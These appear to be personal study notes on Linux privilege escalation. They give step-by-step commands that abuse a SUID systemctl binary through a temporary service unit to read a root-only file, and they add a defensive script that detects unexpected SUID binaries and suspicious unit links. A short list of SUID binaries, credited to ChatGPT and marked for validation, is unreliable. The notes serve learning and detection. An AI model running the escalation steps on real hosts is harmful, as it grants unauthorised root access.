Privilege Escalation Techniques


Created: 28.07.2022

This is about … .

SUID

Writeups 📚:

systemctl

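systemctl is the utility used to start and manage services, for example, an Apache server: sudo systemctl start apache2. However, if the systemctl binary is assigned SUID permissions by mistake, it runs with its owner's (root's) privileges for whoever invokes it, so it can be used for privilege escalation.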

eop=$(mktemp).service # mktemp creates a temp file with a random unique name; that name plus a .service suffix is stored in the eop variable
echo '[Service]
> ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
> [Install]
> WantedBy=multi-user.target' > $eop # write the config for the service into the file. systemctl uses this unit file to run the process specified in the ExecStart directive.
# ❗️ Do not copy this code in whole; enter it line by line without the > sign, or else it will not work
# ❗️ I have added touch $eop but it's not required (it was in my case, because I had an error)

/bin/systemctl link $eop # Creates a symbolic link in the /etc/systemd/system/ directory that points to the service file named in the $eop shell variable. The link allows the service to be managed with systemctl commands.

/bin/systemctl enable --now $eop # Enables and starts the service named in the $eop shell variable. The "enable" option makes the service start at boot time, while the "--now" option starts it immediately after the command is executed.
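
Detection side of the technique above, as an added example that is not part of the original notes: it flags root-owned SUID binaries missing from an expected baseline (a SUID /bin/systemctl would show up here) and unit symlinks that point into world-writable directories, which is what systemctl link leaves behind for a unit file made with mktemp. The baseline list, function names and output labels are assumptions; GNU find is required.

```sh
#!/bin/sh
# Added example (not from the original page): defensive checks for the
# SUID systemctl abuse described above. Requires GNU find (-printf).

# Assumption: binaries expected to be set-uid root on this host.
# The first four paths come from the page's list; adjust per distribution.
SUID_BASELINE='/usr/bin/passwd
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/su
/usr/bin/mount
/usr/bin/umount'

# list_suid ROOT: print "owner path" for each set-uid regular file under ROOT.
list_suid() {
    find "$1" -xdev -type f -perm -4000 -printf '%u %p\n' 2>/dev/null
}

# flag_unexpected_suid: read "owner path" lines on stdin and print every
# root-owned path that is missing from the baseline.
flag_unexpected_suid() {
    while read -r owner path; do
        [ "$owner" = root ] || continue
        printf '%s\n' "$SUID_BASELINE" | grep -qxF -- "$path" ||
            printf 'UNEXPECTED_SUID %s\n' "$path"
    done
}

# flag_linked_units UNIT_DIR: print unit symlinks under UNIT_DIR whose target
# sits in a world-writable directory, the trace left by `systemctl link` and
# `systemctl enable` on a unit file created with mktemp.
flag_linked_units() {
    find "$1" -type l 2>/dev/null | while read -r link; do
        target=$(readlink "$link")
        case $target in
            /tmp/*|/var/tmp/*|/dev/shm/*)
                printf 'SUSPICIOUS_UNIT %s -> %s\n' "$link" "$target" ;;
        esac
    done
}

# Typical use on a live host (run as root):
#   list_suid / | flag_unexpected_suid
#   flag_linked_units /etc/systemd/system
```

If systemctl is reported, removing the bit with chmod u-s /bin/systemctl closes the vector.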

Other

Reference 📚: ChatGPT (to validate)

/usr/bin/passwd: Used to change user passwords. A vulnerability in this file could allow an attacker to gain root privileges.

/usr/bin/chsh: Used to change a user's default shell. A vulnerability in this file could allow an attacker to gain root privileges.

/usr/bin/chfn: Used to change a user's finger information. A vulnerability in this file could allow an attacker to gain root privileges.

/usr/bin/sudo: Used to run commands as another user, typically root. A vulnerability in this file could allow an attacker to gain root privileges.

/usr/bin/sudoedit: Used to edit files as another user, typically root. A vulnerability in this file could allow an attacker to gain root privileges.

🛠 Tools and References


PEASS

Detects possible privilege escalation (PE) vectors on a Windows, Linux, or macOS machine.

GTFOBins

https://gtfobins.github.io/